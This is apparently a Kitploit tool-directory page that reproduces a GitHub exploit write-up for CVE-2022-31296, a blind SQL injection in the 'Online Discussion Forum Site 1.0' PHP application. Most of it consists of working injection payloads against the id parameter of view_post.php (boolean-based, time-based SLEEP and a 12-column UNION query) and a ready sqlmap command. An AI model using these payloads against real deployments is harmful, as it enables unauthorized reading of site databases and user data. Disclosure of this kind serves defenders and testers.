Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-31296 — Online Discussion Forum Site 1.0 - Blind SQL Injection | Kitploit
Tools/GitHubGitHub/bigzooooz/cve-2022-31296
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubbigzooooz/cve-2022-31296

CVE-2022-31296

Online Discussion Forum Site 1.0 - Blind SQL Injection

View Repository
14 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-31296

Online Discussion Forum Site 1.0 - Blind SQL Injection

Exploit Title: Online Discussion Forum Site 1.0 - Blind SQL Injection

Date: 2022-06-13

CVE: CVE-2022-31296

Exploit Author: Abdulaziz Saad (@b4zb0z)

Vendor Homepage: https://www.sourcecodester.com/

Software Link:

Download Tool
https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Version: 1.0

Tested on: LAMP, Ubuntu


[#] Vulnerability Location: $_GET['id'] in /odfs/posts/view_post.php:3

root@kitploit:~
Parameter: id (GET)
root@kitploit:~
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=posts/view_post&id=1' AND 8036=8036 AND 'zhKq'='zhKq
root@kitploit:~
Type: time-based blind
root@kitploit:~
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=posts/view_post&id=1' AND (SELECT 4593 FROM (SELECT(SLEEP(5)))Tmcg) AND 'qyDN'='qyDN
root@kitploit:~
Type: UNION query
root@kitploit:~
Title: Generic UNION query (NULL) - 12 columns
Payload: p=posts/view_post&id=-5399' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767671,0x5a7272534b4b78734a53464e62454b52617876484e6670665570454454526a6963626f506e45776e,0x717a707671)-- -

[#] Exploitation Using SQLMAP: sqlmap -u "http://localhost/odfs/?p=posts/view_post&id=1" --dbms=mysql